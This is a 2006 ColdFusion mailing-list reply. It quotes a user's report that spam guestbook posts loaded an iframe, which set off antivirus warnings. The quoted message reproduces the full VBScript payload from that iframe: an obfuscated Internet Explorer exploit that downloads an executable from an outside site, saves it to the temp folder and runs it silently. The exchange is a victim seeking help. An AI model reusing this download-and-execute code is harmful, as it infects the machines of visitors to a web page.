You lost me. Are /you/ trying to run this VB script? If not, why do you care about /your/ version of IE, it's the spammers browser (or spam tool) that matters.
Ok, after a reread, I think I understand better. The spammer posted some code that included an iframe. When you load your guestbook in IE, you get a bunch of virus warnings. Do I have it right? > -----Original Message----- > From: Brad Wood [mailto:[EMAIL PROTECTED] > Sent: Friday, October 27, 2006 1:14 PM > To: CF-Talk > Subject: weird VB exploit > > Hey guys, I just got some spam posts on my guestbook which include an > iframe. Inside the iframe a page is called which, after calling about > 80 unescape JavaScript functions tries to execute the > following VB code. > I realized it when my antivirus started going nuts telling me about > executable files it was trying run. > > > > Do I need a patch for IE? (IE 6.0 on Windows 2000 SP4) I > didn't think a > web page could execute arbitrary files from a web server. > > > > <script language="VBScript"> > > On Error Resume Next > > Function h2s(s) > > Dim i > > For i = 1 To Len(s) Step 2 > > h2s = h2s & Chr("&" & "H" & Mid(s, i, 2)) > > Next > > End Function > > Const sClassID = > "636C7369643A42443936433535362D363541332D313144302D393833412D3 > 0304330344 > 6433239453336" > > Const sItem_1 = "41646F64622E53747265616D" > > Const sItem_2 = > "536372697074696E672E46696C6553797374656D4F626A656374" > > Const sItem_3 = "4D6963726F736F66742E584D4C48545450" > > Const sItem_4 = "5368656C6C2E4170706C69636174696F6E" > > sFileURL = "http://money24online.com/file.exe"; > > sFileName = "thw_expl.exe" > > Set DF = Document.createElement("object") > > Call DF.SetAttribute("classid", h2s(sClassID)) > > Set AdoSream = DF.CreateObject(h2s(sItem_1), vbNullString) > > Set FS = DF.CreateObject(h2s(sItem_2), vbNullString) > > Set xml_http = DF.CreateObject(h2s(sItem_3), vbNullString) > > Call xml_http.Open("GET", sFileURL, False) > > Call xml_http.Send > > AdoSream.Type = 1 > > Set tmp_path = FS.GetSpecialFolder(2) > > sFilePath = FS.BuildPath(tmp_path, sFileName) > > Call AdoSream.Open > > Call AdoSream.Write(xml_http.responseBody) > > Call AdoSream.SaveToFile(sFilePath, 2) > > Call AdoSream.Close > > Set Q = df.CreateObject(h2s(sItem_4), vbNullString) > > Call Q.ShellExecute(sFilePath, vbNullString, vbNullString, "open", 0) > > </script> > > > > ~Brad > > > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Introducing the Fusion Authority Quarterly Update. 80 pages of hard-hitting, up-to-date ColdFusion information by your peers, delivered to your door four times a year. http://www.fusionauthority.com/quarterly Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:258338 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
